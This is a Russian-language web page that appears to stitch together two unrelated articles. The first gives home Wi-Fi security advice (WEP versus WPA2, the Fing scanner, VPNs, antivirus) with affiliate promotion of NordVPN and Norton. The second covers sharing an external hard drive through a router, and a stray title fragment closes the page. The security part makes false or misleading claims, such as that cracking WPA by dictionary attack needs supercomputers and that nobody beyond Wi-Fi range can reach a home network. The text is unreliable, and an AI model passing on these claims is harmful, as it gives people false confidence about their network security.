Если ваш маршрутизатор старый, возможно, он все еще использует протокол WEP, тогда вы должны знать, что любой, кто хоть немного разбирается в хакерских атаках, может взломать маршрутизатор буквально менее чем за минуту.

Итак, если он включен на вашем маршрутизаторе, то продолжайте и отключите, как я.

У вас должен быть WPA2 с шифрованием AES. На рисунке ниже сила аутентификации (защита от взлома) увеличивается сверху вниз (WPA менее безопасен, а WPA2-PSK с AES является наиболее безопасным).

Некоторые хакеры используют атаку по словарю для взлома протокола WPA, но для его взлома нужны суперкомпьютеры. Итак, пока вы не знаменитость или миллиардер, никто не будет тратить столько ресурсов, чтобы проникнуть в вашу сеть.

Обычно вы можете подключиться к настройкам домашнего маршрутизатора, перейдя на локальный IP-адрес, например http://192.168.0.1/.

Как узнать, взломал ли кто-то ваш роутер

Одним из верных признаков взлома маршрутизаторов является наличие неизвестного устройства, подключенного к локальной сети Wi-Fi.

Как я объяснил выше, для выполнения атаки «человек посередине» (MITM) хакер должен сначала подключиться к сети WiFI. И если он подключен, вы его тоже можете увидеть.

Один из способов узнать подключенные устройства — через настройки роутера. Некоторые маршрутизаторы позволяют нам видеть все подключенные устройства и при необходимости отключать их.

Другой способ — использовать приложение сетевого сканера. Например, я нашел классное приложение под названием Fing. Приложение доступно практически для всех платформ: iOS, Android, macOS и Windows.

Это бесплатно (с рекламой) и даже не требует создания учетной записи, чтобы использовать его.

У них есть одна интересная функция — сканирование открытых портов.

Например, когда я сканировал свой MacBook Pro, я обнаружил, что функции удаленного рабочего стола и совместного использования экрана включены, и любой может подключиться к моему Mac удаленно.

Как защититься от атаки MITM

Хотя можно сканировать и находить неизвестные устройства в домашней сети, этот подход не будет работать с общедоступными сетями Wi-Fi, такими как сеть Starbucks или гостиница.

Вы никогда не узнаете, была ли взломана общедоступная сеть. В этом случае единственный способ защитить вашу конфиденциальность — использовать VPN (виртуальную частную сеть).

При подключении к VPN ваш компьютер или телефон создает безопасный зашифрованный канал с VPN-сервером. После установления соединения все запросы отправляются на сервер VPN. Сервер выполняет все запросы от вашего имени и возвращает вам результаты.

Со стороны кажется, что компьютер отправляет мусор на один и тот же компьютер и обратно.Даже если хакер собирает информацию, он не сможет определить, подключаетесь ли вы к Google.com или MacMyths.com.

При выборе программного обеспечения VPN следуйте этим рекомендациям:

  • Не используйте бесплатный VPN. У них есть существенные ограничения, и вы знаете, что хорошее никогда не бывает бесплатным.
  • Тест на скорость. Некоторые VPS значительно быстрее других.
  • Проверьте репутацию провайдера. Поскольку все запросы теперь проходят через VPN, технически сервер VPN становится человеком посередине.Поэтому выбирайте только надежных поставщиков.

Лично я использую NordVPN: он самый быстрый на рынке и очень недорогой. Он доступен для нескольких платформ: macOS, Windows, Linux, iOS и Android.

Если вы воспользуетесь моей партнерской ссылкой NordVPN, вы получите довольно большую скидку на трехлетний план для 6 устройств.

Удаленный взлом компьютера

Мы обсуждали способы взлома компьютеров и телефонов через локальный Wi-Fi, но я знаю, что большинство людей задают вопрос, могут ли хакеры подключиться к домашней сети, когда они находятся на другом конце света (или на расстоянии более ста ярдов или метров).

К счастью, ответ — нет, кто-то не может проникнуть в вашу домашнюю сеть, даже если они знают пароль, если они находятся за пределами диапазона (более 300 футов).

Также в большинстве случаев хакеры не могут проникнуть в ваш выключенный компьютер (ссылка).

Однако есть и другие способы удаленного доступа к вашей системе. Вы помните историю об утечке личных данных Безоса?

В его случае он получил сообщение в WhatsApp с вложенным вредоносным ПО.Когда вредоносная программа была установлена ​​на его телефон, она начала отправлять личные данные на сервер за границу.

Точно так же все мы рискуем установить вредоносное ПО на наши компьютеры и смартфоны. Некоторые вредоносные программы открывают доступ к устройству, поэтому хакеры могут получить к нему доступ удаленно.

Или вредоносная программа может быть кейлоггером, и в этом случае даже HTTPS или VPN не помогут. Кейлоггер будет записывать нажатия клавиш на клавиатуре, и если это будет номер кредитной карты, то он будет у хакера.

Итак, как защитить устройства от вредоносных программ? Нужно установить антивирус.

Существует распространенный миф о том, что на Mac не может быть вирусов, но это не так. Мне удалось внедрить на свой Mac более 100 образцов вредоносных программ при тестировании различных решений для защиты от вредоносных программ.

Вы можете проверить результаты моего теста и рекомендуемые антивирусы в моем посте: Лучшее приложение для обнаружения вредоносных программ для Mac.

Каждый раз, когда мои друзья и семья спрашивают меня о рекомендуемом антивирусе, я выбираю Norton 360.Он обеспечивает максимальную отдачу от вложенных средств и обеспечивает защиту от вредоносных программ и другие функции безопасности на всех платформах. И еще у него есть собственный VPN!

Заключение

Мы рассмотрели несколько способов взлома вашего телефона или компьютера через Wi-Fi. Я также перечислил способы предотвращения этого, и хотел бы повторить это еще раз.

Если вы беспокоитесь о сетевой безопасности, подумайте о приобретении следующих инструментов:

  • Программное обеспечение VPN
  • Антивирусная программа

Будьте очень осторожны при подключении к общедоступной сети Wi-Fi.Я бы сказал, что если у вас нет VPN, установленной на ноутбуке или смартфоне, не используйте общедоступный Wi-Fi или, по крайней мере, избегайте покупок с помощью кредитной карты или ввода паролей.

Если вас интересует тема безопасности, на Udemy есть отличный курс по этическому взлому. Инструктор учит, как этично взламывать компьютеры, и, самое главное, что вы можете сделать, чтобы не стать целью:

Изучите взлом сети с нуля (Wi-Fi и проводной)

Фото: © canva.com / cyano66

Поделитесь своим внешним жестким диском с вашей сетью Wi-Fi

Если вы хотите получить доступ к внешнему жесткому диску, не прибегая к архаичному методу — таскать его по дому и подключать к каждому устройству, с которым вам нужно используйте его, есть два простых решения о том, как предоставить общий доступ к внешнему жесткому диску через сеть Wi-Fi.

Для первого решения вам нужно проверить свой маршрутизатор. Большинство современных маршрутизаторов имеют USB-порт, к которому вы можете подключить USB-совместимое устройство для совместного использования с другими устройствами в вашей сети, такими как принтер или, в данном случае, внешний жесткий диск.Как только вы обнаружите порт USB на маршрутизаторе, подключите внешний жесткий диск USB. Большинство современных маршрутизаторов должны мгновенно распознавать подключение внешнего жесткого диска. Также рекомендуется войти в настройки маршрутизатора, будь то через браузер или мобильное приложение, и найти вариант для обмена файлами, USB-приложение или что-то подобное. В зависимости от вашего маршрутизатора у вас может быть доступ к большему количеству опций. Например, роутер ASUS RT-AC68U обеспечивает совместное использование файлов или доступ к мультимедиа.Используя ASUS AiDisk, вы даже получите удаленный доступ и быструю потоковую передачу контента.

Двухдиапазонный гигабитный маршрутизатор ASUS RT-AC68U Wireless-AC1900

Вышеупомянутый метод поддерживает внешние жесткие диски объемом до 4 ТБ в зависимости от формата. Вы можете выбрать внешний жесткий диск WD My Book Desktop емкостью 4 ТБ или внешний жесткий диск WD Elements Desktop объемом 4 ТБ, но некоторые внешние жесткие диски предназначены для совместного использования в вашей сети, например, персональный облачный NAS-сервер WD My Cloud Home 4 ТБ с 1 отсеком. С WD My Cloud вы можете подключить его к маршрутизатору через Gigabit Ethernet вместо порта USB.

Персональный облачный NAS-сервер WD My Cloud Home емкостью 8 ТБ с 1 отсеком

После подключения у вас есть удаленный доступ к WD My Cloud Home через браузер или мобильное приложение. WD My Cloud Home позволяет хранить и систематизировать фотографии, видео и музыку в домашней сети и передавать их на несколько устройств, например на другие ПК, медиаплееры, игровые консоли и другие DLNA-сертифицированные устройства. Вы также можете создавать резервные копии файлов с нескольких компьютеров на WD My Cloud Home. Еще один удобный вариант — загружать фотографии и видео прямо со смартфона, чтобы освободить место на мобильном устройстве.WD My Cloud Home также имеет порт расширения USB, который можно использовать для подключения совместимого жесткого диска USB 3.1 Gen 1 для увеличения емкости хранилища. Вы можете установить защиту паролем на своем WD My Cloud Home, что рекомендуется.

Также рекомендуется подключить внешний диск к компьютеру для быстрого и легкого доступа. Подключить сетевой диск очень просто. Просто следуйте инструкциям, перечисленным ниже.

Windows 10

  1. Откройте File Explorer с панели задач или из меню Start .Кроме того, вы можете использовать сочетание клавиш Windows Key + E .
  2. Выберите Этот компьютер на левой панели, а затем выберите Подключить сетевой диск на вкладке Компьютер .
  3. В списке Диск выберите букву диска (подойдет любая доступная буква).
  4. В поле Папка введите путь к папке или компьютеру или выберите Обзор , чтобы найти папку. Чтобы подключаться каждый раз при входе в систему, установите флажок « Повторно подключаться при входе в систему» ​​.
  5. Не забудьте нажать Готово , когда закончите.

macOS High Sierra

  1. В Finder щелкните Перейти в меню и выберите Подключиться к серверу .
  2. Введите адрес внешнего жесткого диска и нажмите Connect .
  3. Выберите радиокнопку Зарегистрированный пользователь и введите имя и пароль пользователя с правами доступа к конкретному общему ресурсу, который необходимо сопоставить.
  4. Выберите общий ресурс на диске и нажмите OK .
  5. Чтобы отобразить подключенные диски на рабочем столе, откройте настройки Finder (выберите Finder , затем Настройки ) и установите флажок «Подключенные серверы ».

Вы пробовали подключить внешний жесткий диск к маршрутизатору через USB или Gigabit Ethernet? Сообщите нам, как выглядят ваши настройки, в разделе комментариев ниже.

Компьютерный взлом через маршрутизатор «Wonder How To

Как к

Ваш комментарий будет первым

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *